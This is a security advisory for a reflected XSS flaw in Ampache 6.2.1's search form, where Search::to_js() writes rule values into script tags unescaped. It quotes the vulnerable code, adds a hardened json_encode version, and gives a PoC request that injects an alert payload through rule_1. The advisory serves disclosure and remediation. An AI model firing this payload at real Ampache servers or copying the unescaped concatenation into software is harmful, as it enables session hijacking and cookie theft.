Summary
Ampache 6.2.1 has multiple reflected XSS vulnerabilities; every form in Ampache that uses a search rule as a variable is affected.
For example, when querying a song or a podcast, the search form passes the rule through the $rule variable, which is then written into the page unescaped.
Details
ampache/src/Repository/Model/Search.php, lines 1732 to 1740 in bcaa9a4:

    public function to_js(): string
    {
        $javascript = "";
        foreach ($this->rules as $rule) {
            // each element of $rule is concatenated into the <script> body without escaping
            $javascript .= '<script>' . 'SearchRow.add("' . $rule[0] . '","' . $rule[1] . '","' . $rule[2] . '", "' . $rule[3] . '"); </script>';
        }

        return $javascript;
    }
The root cause is that the $rule values ($rule[0], $rule[1], $rule[2], $rule[3]) are concatenated straight into $javascript, and therefore into the front-end page, without any escaping. A value containing a double quote or a closing </script> tag ends the string literal or the script element and the remainder is parsed as attacker-controlled HTML and JavaScript.
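The following is an added example, not Ampache's code: a small class (the name SearchRulesJs and its method names are assumptions for illustration) that reproduces the vulnerable concatenation pattern from the advisory beside a hardened version. The hardened version turns every rule value into a JSON string literal with json_encode and the JSON_HEX_* flags, so <, >, &, ' and " are emitted as \uXXXX escapes and neither a quote nor a </script> sequence in a rule value can leave the literal or the script element. The sample input is constructed and reuses the rule_1 payload shown in the PoC below.

```php
<?php
// Added example (not Ampache's code): the unsafe pattern next to a hardened one.
declare(strict_types=1);

final class SearchRulesJs
{
    /** @param array<int, array<int, string>> $rules  each rule is [name, operator, input, subtype] */
    public function __construct(private array $rules) {}

    // Vulnerable pattern from the advisory: rule values concatenated into a <script> body unescaped.
    public function toJsUnsafe(): string
    {
        $javascript = '';
        foreach ($this->rules as $rule) {
            $javascript .= '<script>SearchRow.add("' . $rule[0] . '","' . $rule[1] . '","' . $rule[2] . '", "' . $rule[3] . '"); </script>';
        }

        return $javascript;
    }

    // Hardened: every value becomes a JSON string literal; JSON_HEX_TAG/AMP/APOS/QUOT hex-escape
    // <, >, &, ' and " so the literal cannot be terminated early and "</script>" never appears raw.
    private static function jsLiteral(string $value): string
    {
        return json_encode(
            $value,
            JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
            | JSON_INVALID_UTF8_SUBSTITUTE | JSON_THROW_ON_ERROR
        );
    }

    public function toJsSafe(): string
    {
        $javascript = '';
        foreach ($this->rules as $rule) {
            // only the four positional values are emitted, each as an escaped literal
            $args = implode(', ', array_map(
                fn($v): string => self::jsLiteral((string) $v),
                array_slice($rule, 0, 4)
            ));
            $javascript .= '<script>SearchRow.add(' . $args . ');</script>';
        }

        return $javascript;
    }
}

// Constructed sample input: the rule_1 payload from the advisory's PoC request.
$payload = '1</script><script>alert(1)</script><script>';
$rules   = new SearchRulesJs([[$payload, 'title', '1', 'contains']]);

echo $rules->toJsUnsafe(), PHP_EOL;
echo $rules->toJsSafe(), PHP_EOL;

// Self-check: the unsafe output breaks out of the script element, the hardened output
// contains exactly one closing tag, the real one.
assert(str_contains($rules->toJsUnsafe(), '</script><script>alert(1)</script>'));
assert(substr_count($rules->toJsSafe(), '</script>') === 1);
```

Run with `php example.php` (PHP 8.0 or later for constructor property promotion). Escaping at the point where data is written into a script context is the fix that matters here; validating rule_1 on input helps, but any later code path that writes the same value into HTML or JavaScript still needs its own context-appropriate encoding.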
PoC
POST /search.php?type=song HTTP/1.1
Host: ip:port
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: ampache=cuc4m0elqlokqdum34ru7m4spf; ampache_user=admin2; ampache_lang=zh_CN; ampache_remember=admin2%3A24a826cec0ddf0bbd727dd8952db70dc%3A6b7985702a9d39573700e27c9f85ab232c497e86103a0e066d2de2ec7f2ac473
Connection: close
Content-Length: 712
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="action"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="browse_id"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="limit"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="operator"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="random"
on
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="rule_1"
1</script><script>alert(1)</script><script>
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="rule_1_input"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="rule_1_operator"
1
------------YWJkMTQzNDcw--
Impact
In the form served by search.php, many parameters can be used to tamper with the HTML page. If the attacker hosts a form on a web page of their own, a logged-in user or administrator who visits that page is made to submit the malicious form through the attacker's page, which can result in cookie theft.